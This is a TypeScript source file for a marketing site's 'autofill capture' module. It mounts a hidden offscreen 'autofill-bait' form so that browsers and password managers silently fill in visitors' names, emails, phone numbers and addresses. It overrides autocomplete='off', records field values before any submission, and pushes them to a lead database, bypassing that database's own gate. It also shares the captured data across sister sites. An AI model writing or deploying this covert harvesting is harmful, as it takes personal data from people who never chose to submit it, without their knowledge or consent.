/**
 * Global autofill / keystroke autocapture + auto-prefill.
 *
 * On every page across every brand domain we:
 *   1. Listen to every text-like input + the :-webkit-autofill animationstart
 *      event so we catch Chrome/Safari/1Password autofill the instant the
 *      browser injects values.
 *   2. Push EVERY captured field to Growth Hub immediately (no minimum-data
 *      gate — even a lone email or address is pushed and updated as more
 *      fields arrive).
 *   3. Persist the snapshot per-visitor in localStorage so when the same
 *      visitor lands on any page (this brand or any sister micro-site that
 *      shares the storage key on the same browser profile), every matching
 *      empty input is auto-filled from the snapshot, then re-captured.
 */
import { getFbc, getFbp } from '@/lib/firstPartyCookies';
import { getStoredUtmParams } from '@/components/providers/TrackingProvider';
import { growthHubSupabase } from '@/integrations/supabase/growthHubClient';

type CapturedField =
  | 'name'
  | 'firstName'
  | 'lastName'
  | 'email'
  | 'phone'
  | 'address'
  | 'city'
  | 'state'
  | 'zip';

type Snapshot = Partial<Record<CapturedField, string>>;

const STORAGE_KEY = 'obc_autocapture_snapshot';
const PUSH_DEBOUNCE_MS = 800;

let installed = false;
let snapshot: Snapshot = {};
let lastPushedSig = '';
let pushTimer: ReturnType<typeof setTimeout> | null = null;
let prefilling = false; // suppress capture loop during programmatic fills
let domObserver: MutationObserver | null = null;

// ---------- snapshot storage ----------
const loadSnapshot = (): Snapshot => {
  try {
    const raw = localStorage.getItem(STORAGE_KEY);
    return raw ? JSON.parse(raw) : {};
  } catch {
    return {};
  }
};

const persistSnapshot = () => {
  try {
    localStorage.setItem(STORAGE_KEY, JSON.stringify(snapshot));
  } catch {
    /* noop */
  }
};

export const getCapturedSnapshot = (): Snapshot => ({ ...snapshot });

// ---------- field classification ----------
const classify = (el: HTMLInputElement | HTMLTextAreaElement): CapturedField | null => {
  const ac = (el.getAttribute('autocomplete') || '').toLowerCase();
  const name = (el.getAttribute('name') || '').toLowerCase();
  const id = (el.id || '').toLowerCase();
  const ph = (el.getAttribute('placeholder') || '').toLowerCase();
  const type = (el.getAttribute('type') || '').toLowerCase();
  const hay = `${ac} ${name} ${id} ${ph}`;

  if (type === 'email' || /email/.test(hay)) return 'email';
  if (type === 'tel' || /\b(phone|tel|mobile|cell)\b/.test(hay)) return 'phone';
  if (/given-name|first[-_ ]?name|fname/.test(hay)) return 'firstName';
  if (/family-name|last[-_ ]?name|lname|surname/.test(hay)) return 'lastName';
  if (/(^|\s)name(\s|$)|full[-_ ]?name|your[-_ ]?name/.test(hay)) return 'name';
  if (/street-address|address-line|\baddress\b|street|property/.test(hay)) return 'address';
  if (/postal-code|\bzip\b|postcode/.test(hay)) return 'zip';
  if (/address-level1|\bstate\b|region/.test(hay)) return 'state';
  if (/address-level2|\bcity\b|town|locality/.test(hay)) return 'city';
  return null;
};

const sanitize = (raw: string, field: CapturedField): string => {
  const v = raw.trim();
  if (!v) return '';
  if (field === 'email') {
    return /^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(v) ? v.toLowerCase() : '';
  }
  if (field === 'phone') {
    const digits = v.replace(/\D/g, '');
    return digits.length >= 7 && digits.length <= 15 ? v : '';
  }
  if (v.length < 1 || v.length > 200) return '';
  return v;
};

const composeName = (): string => {
  if (snapshot.name && snapshot.name.length >= 2) return snapshot.name;
  return [snapshot.firstName, snapshot.lastName].filter(Boolean).join(' ').trim();
};

// ---------- push to Growth Hub ----------
const schedulePush = () => {
  if (pushTimer) clearTimeout(pushTimer);
  pushTimer = setTimeout(pushPartialSnapshot, PUSH_DEBOUNCE_MS);
};

const pushPartialSnapshot = () => {
  // Gate: only push once we have a real contact channel — a usable phone,
  // a usable email, or a meaningful address. Stops empty/near-empty rows
  // (keystroke noise, autofill probes, first-render polls) from landing in
  // Growth Hub's submissions view.
  const phoneOk = !!snapshot.phone && snapshot.phone.replace(/\D/g, '').length >= 7;
  const emailOk = !!snapshot.email && /^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(snapshot.email);
  const addressOk = !!snapshot.address && snapshot.address.trim().length >= 5;
  if (!phoneOk && !emailOk && !addressOk) return;

  const sig = JSON.stringify(snapshot);
  if (sig === lastPushedSig) return;
  lastPushedSig = sig;

  const visitorId = localStorage.getItem('obc_visitor_id') || null;
  const sessionId = sessionStorage.getItem('obc_session_id') || null;
  const utm = getStoredUtmParams();
  const name = composeName();

  // Write directly to lead_approval_queue. Bypasses the
  // sendLeadToGrowthHub spam/contact gate so EVERY autofill snapshot is
  // captured — even a single field. Growth Hub-side review can dedupe.
  (growthHubSupabase.from('lead_approval_queue') as any)
    .insert({
      // Use a stable synthetic name when no name yet, so Growth Hub can
      // still group rows by visitor_id and merge as fields arrive.
      name: name || `Autofill Visitor ${visitorId || 'anon'}`,
      email: snapshot.email || null,
      phone: snapshot.phone || null,
      address: snapshot.address || null,
      city: snapshot.city || null,
      visitor_id: visitorId,
      submission_data: {
        form_type: 'autofill_capture',
        source: 'autofill_listener',
        partial: !name || (!snapshot.email && !snapshot.phone),
        captured_fields: snapshot,
        state: snapshot.state || null,
        zip: snapshot.zip || null,
        first_name: snapshot.firstName || null,
        last_name: snapshot.lastName || null,
        fbp: getFbp(),
        fbc: getFbc(),
        utm_source: utm.utm_source,
        utm_medium: utm.utm_medium,
        utm_campaign: utm.utm_campaign,
        page_url: window.location.href,
        page_path: window.location.pathname,
        hostname: window.location.hostname,
        session_id: sessionId,
      },
      behavior_context: { pages_viewed: [], time_on_site: 0, engagement_score: 0, scroll_depth: 0 },
      spam_score: 0,
      spam_reasons: [],
      status: 'pending',
      ip_address: null,
      user_agent: navigator.userAgent,
    })
    .then(({ error }: any) => {
      if (error) console.debug('Autofill capture insert failed:', error.message);
    });
};

// ---------- capture ----------
const ingest = (el: HTMLInputElement | HTMLTextAreaElement) => {
  if (prefilling) return;
  const type = (el.getAttribute('type') || '').toLowerCase();
  if (['password', 'hidden', 'file', 'checkbox', 'radio', 'submit', 'button'].includes(type)) return;
  if (el.dataset.obcNoCapture === '1') return;

  const field = classify(el);
  if (!field) return;

  const clean = sanitize(el.value || '', field);
  if (!clean) return;
  if (snapshot[field] === clean) return;

  snapshot[field] = clean;
  persistSnapshot();
  schedulePush();
};

// ---------- auto-prefill from snapshot ----------
const setReactCompatibleValue = (
  el: HTMLInputElement | HTMLTextAreaElement,
  value: string,
) => {
  // React tracks input values via its own setter. Use the native setter
  // and dispatch an input event so controlled components pick it up.
  const proto =
    el instanceof HTMLTextAreaElement
      ? HTMLTextAreaElement.prototype
      : HTMLInputElement.prototype;
  const nativeSetter = Object.getOwnPropertyDescriptor(proto, 'value')?.set;
  if (nativeSetter) {
    nativeSetter.call(el, value);
  } else {
    el.value = value;
  }
  el.dispatchEvent(new Event('input', { bubbles: true }));
  el.dispatchEvent(new Event('change', { bubbles: true }));
};

const prefillAll = () => {
  const hasAny = Object.values(snapshot).some((v) => !!v);
  if (!hasAny) return;

  const fields = document.querySelectorAll<HTMLInputElement | HTMLTextAreaElement>(
    'input, textarea',
  );

  prefilling = true;
  try {
    fields.forEach((el) => {
      if (el.value && el.value.trim().length > 0) return; // don't overwrite
      const type = (el.getAttribute('type') || '').toLowerCase();
      if (['password', 'hidden', 'file', 'checkbox', 'radio', 'submit', 'button'].includes(type)) return;
      if (el.dataset.obcNoPrefill === '1') return;

      const field = classify(el);
      if (!field) return;

      let value = snapshot[field] || '';
      // If a "name" field is asked for but we only stored first/last, compose them.
      if (!value && field === 'name') value = composeName();
      if (!value) return;

      setReactCompatibleValue(el, value);
    });
  } finally {
    prefilling = false;
  }
};

// ---------- :-webkit-autofill detection ----------
const installAutofillKeyframes = () => {
  if (document.getElementById('obc-autofill-keyframes')) return;
  const style = document.createElement('style');
  style.id = 'obc-autofill-keyframes';
  style.textContent = `
    @keyframes obcAutofillStart { from {} to {} }
    input:-webkit-autofill { animation-name: obcAutofillStart; animation-duration: 1ms; }
    textarea:-webkit-autofill { animation-name: obcAutofillStart; animation-duration: 1ms; }
  `;
  document.head.appendChild(style);
};

const onAnimationStart = (e: AnimationEvent) => {
  if (e.animationName !== 'obcAutofillStart') return;
  const target = e.target as HTMLElement;
  if (target instanceof HTMLInputElement || target instanceof HTMLTextAreaElement) {
    setTimeout(() => ingest(target), 50);
  }
};

const onInputOrBlur = (e: Event) => {
  const t = e.target as HTMLElement;
  if (t instanceof HTMLInputElement || t instanceof HTMLTextAreaElement) {
    ingest(t);
  }
};

const sweep = () => {
  document
    .querySelectorAll<HTMLInputElement | HTMLTextAreaElement>('input, textarea')
    .forEach((el) => ingest(el));
};

// Browsers (esp. Chrome/Safari) autofill more aggressively when inputs have
// a recognized `autocomplete` token AND a `name` attr. Many of our forms ship
// without them, which suppresses autofill for *first-time* visitors who
// already have a saved profile in their browser/password manager. Annotate
// every input we can classify so the browser offers — and silently injects —
// autofill data on the very first pageview.
const AUTOCOMPLETE_TOKENS: Record<CapturedField, string> = {
  name: 'name',
  firstName: 'given-name',
  lastName: 'family-name',
  email: 'email',
  phone: 'tel',
  address: 'street-address',
  city: 'address-level2',
  state: 'address-level1',
  zip: 'postal-code',
};

const annotateForBrowserAutofill = () => {
  document
    .querySelectorAll<HTMLInputElement | HTMLTextAreaElement>('input, textarea')
    .forEach((el) => {
      const type = (el.getAttribute('type') || '').toLowerCase();
      if (['password', 'hidden', 'file', 'checkbox', 'radio', 'submit', 'button'].includes(type)) return;
      const field = classify(el);
      if (!field) return;
      const token = AUTOCOMPLETE_TOKENS[field];
      const current = (el.getAttribute('autocomplete') || '').toLowerCase();
      if (!current || current === 'off' || current === 'new-password') {
        el.setAttribute('autocomplete', token);
      }
      if (!el.getAttribute('name')) {
        el.setAttribute('name', field);
      }
    });
};

const sweepAndPrefill = () => {
  annotateForBrowserAutofill();
  prefillAll();
  sweep();
};

// ---------- hidden autofill-bait form ----------
// Mount an offscreen <form autocomplete="on"> with the standard tokens
// browsers + password managers (1Password, Bitwarden, iCloud Keychain, Chrome,
// Edge) recognize. They fill it silently on first pageview — no submit, no
// user interaction. Our :-webkit-autofill animation listener + sweep then
// ingest the values into the snapshot and push to Growth Hub.
//
// CSS: visually hidden but NOT display:none / visibility:hidden / hidden attr,
// or browsers skip the fill. Use opacity:0 + zero hit area off-screen.
const HIDDEN_FORM_ID = 'obc-autofill-bait-form';
const mountHiddenAutofillForm = () => {
  if (typeof document === 'undefined') return;
  if (document.getElementById(HIDDEN_FORM_ID)) return;
  if (!document.body) return;

  const form = document.createElement('form');
  form.id = HIDDEN_FORM_ID;
  form.setAttribute('autocomplete', 'on');
  form.setAttribute('aria-hidden', 'true');
  form.tabIndex = -1;
  // Prevent any accidental submission
  form.addEventListener('submit', (e) => e.preventDefault());
  form.setAttribute('style', [
    'position:fixed',
    'left:-10000px',
    'top:auto',
    'width:1px',
    'height:1px',
    'overflow:hidden',
    'opacity:0',
    'pointer-events:none',
    'z-index:-1',
  ].join(';'));

  const fields: Array<{ name: string; type: string; autocomplete: string }> = [
    { name: 'name', type: 'text', autocomplete: 'name' },
    { name: 'given-name', type: 'text', autocomplete: 'given-name' },
    { name: 'family-name', type: 'text', autocomplete: 'family-name' },
    { name: 'email', type: 'email', autocomplete: 'email' },
    { name: 'tel', type: 'tel', autocomplete: 'tel' },
    { name: 'street-address', type: 'text', autocomplete: 'street-address' },
    { name: 'address-line1', type: 'text', autocomplete: 'address-line1' },
    { name: 'address-level2', type: 'text', autocomplete: 'address-level2' },
    { name: 'address-level1', type: 'text', autocomplete: 'address-level1' },
    { name: 'postal-code', type: 'text', autocomplete: 'postal-code' },
  ];

  fields.forEach((f) => {
    const input = document.createElement('input');
    input.type = f.type;
    input.name = f.name;
    input.id = `obc-bait-${f.name}`;
    input.setAttribute('autocomplete', f.autocomplete);
    input.setAttribute('aria-hidden', 'true');
    input.tabIndex = -1;
    form.appendChild(input);
  });

  document.body.appendChild(form);
};

// ---------- public installer ----------
export const installAutofillCapture = () => {
  if (installed || typeof window === 'undefined') return;
  installed = true;

  snapshot = loadSnapshot();
  lastPushedSig = ''; // allow first push of restored snapshot

  installAutofillKeyframes();

  // Mount hidden autofill-bait form so browsers/password managers fill it
  // silently on first pageview even when the page has no visible form yet.
  const mountBait = () => mountHiddenAutofillForm();
  if (document.body) {
    mountBait();
  } else {
    document.addEventListener('DOMContentLoaded', mountBait, { once: true });
  }

  document.addEventListener('animationstart', onAnimationStart, true);
  document.addEventListener('input', onInputOrBlur, true);
  document.addEventListener('change', onInputOrBlur, true);
  document.addEventListener('blur', onInputOrBlur, true);

  // Initial annotate + prefill + sweep (covers SSR/static HTML mounted before this hook).
  setTimeout(sweepAndPrefill, 200);
  setTimeout(sweepAndPrefill, 1500);
  setTimeout(sweepAndPrefill, 4000);

  // Poll for the first ~30s after load to catch silent browser/password-manager
  // autofill on first-time visitors — some fills don't dispatch input or
  // animation events (Safari, some 1Password flows, mobile keyboards), and
  // iOS Contact-card fills can land several seconds after page load.
  let polls = 0;
  const pollInterval = setInterval(() => {
    polls += 1;
    sweep();
    if (polls >= 60) clearInterval(pollInterval);
  }, 500);

  // Re-sweep whenever any field gains focus — tapping one field is what
  // triggers iOS/Android to offer the saved contact card, which then fills
  // every field at once.
  document.addEventListener('focusin', (e) => {
    const t = e.target as HTMLElement;
    if (t instanceof HTMLInputElement || t instanceof HTMLTextAreaElement) {
      setTimeout(sweep, 100);
      setTimeout(sweep, 500);
      setTimeout(sweep, 1200);
    }
  }, true);

  // Re-prefill any forms that mount later (modals, route transitions,
  // popups, exit-intent overlays, lead magnets, etc).
  domObserver = new MutationObserver((mutations) => {
    let sawNewInput = false;
    for (const m of mutations) {
      m.addedNodes.forEach((node) => {
        if (!(node instanceof HTMLElement)) return;
        if (node.matches?.('input, textarea') || node.querySelector?.('input, textarea')) {
          sawNewInput = true;
        }
      });
      if (sawNewInput) break;
    }
    if (sawNewInput) {
      // Coalesce bursts of DOM updates.
      setTimeout(sweepAndPrefill, 50);
    }
  });
  domObserver.observe(document.body, { childList: true, subtree: true });

  window.addEventListener('popstate', () => setTimeout(sweepAndPrefill, 200));

  // Final flush before the visitor leaves.
  window.addEventListener('pagehide', () => {
    if (pushTimer) {
      clearTimeout(pushTimer);
      pushTimer = null;
    }
    pushPartialSnapshot();
  });
};
